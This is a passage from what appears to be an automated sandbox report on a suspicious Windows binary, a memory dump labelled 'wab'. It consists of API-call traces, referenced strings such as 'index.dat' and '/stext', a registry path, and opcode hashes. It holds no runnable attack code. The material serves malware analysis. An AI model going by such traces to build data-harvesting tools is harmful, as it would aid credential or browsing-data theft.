                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                  • GetLastError.KERNEL32 ref: 00417627
                  Similarity
                  • API ID: ErrorLast$File$PointerRead
                  • String ID:
                  • API String ID: 839530781-0
                  Similarity
                  • API ID: FileFindFirst
                  • String ID: *.*$index.dat
                  • API String ID: 1974802433-2863569691
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                  • GetLastError.KERNEL32 ref: 004175A2
                  • GetLastError.KERNEL32 ref: 004175A8
                  Similarity
                  • API ID: ErrorLast$FilePointer
                  • String ID:
                  • API String ID: 1156039329-0
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  Similarity
                  • API ID: File$ChangeCloseCreateFindNotificationTime
                  • String ID:
                  • API String ID: 1631957507-0
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  Similarity
                  • API ID: Temp$DirectoryFileNamePathWindows
                  • String ID:
                  • API String ID: 1125800050-0
                  Strings
                  • failed memory resize %u to %u bytes, xrefs: 00415358
                  Similarity
                  • API ID: realloc
                  • String ID: failed memory resize %u to %u bytes
                  • API String ID: 471065373-2134078882
                  Similarity
                  • API ID:
                  • String ID: d
                  • API String ID: 0-2564639436
                  Similarity
                  • API ID: memset
                  • String ID: BINARY
                  • API String ID: 2221118986-907554435
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                  Similarity
                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                  • String ID:
                  • API String ID: 1161345128-0
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /stext
                  • API String ID: 2081463915-3817206916
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  Similarity
                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                  • String ID:
                  • API String ID: 159017214-0
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  Strings
                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                  Similarity
                  • API ID: malloc
                  • String ID: failed to allocate %u bytes of memory
                  • API String ID: 2803490479-1168259600
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  Similarity
                  • API ID: memcmpmemset
                  • String ID:
                  • API String ID: 1065087418-0
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  APIs
                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                  Similarity
                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                  • String ID:
                  • API String ID: 1481295809-0
                  APIs
                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                  APIs
                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$PointerRead
                  • String ID:
                  • API String ID: 3154509469-0
                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                  APIs
                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itowmemset
                  • String ID:
                  • API String ID: 4232544981-0
                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                  APIs
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$FileModuleName
                  • String ID:
                  • API String ID: 3859505661-0
                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                  APIs
                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                  APIs
                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                  APIs
                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                  APIs
                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                  APIs
                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                  APIs
                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                  APIs
                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                  APIs
                  • memset.MSVCRT ref: 004095FC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                  • String ID:
                  • API String ID: 3655998216-0
                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                  • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                  • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                  • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                  APIs
                  • memset.MSVCRT ref: 00445426
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
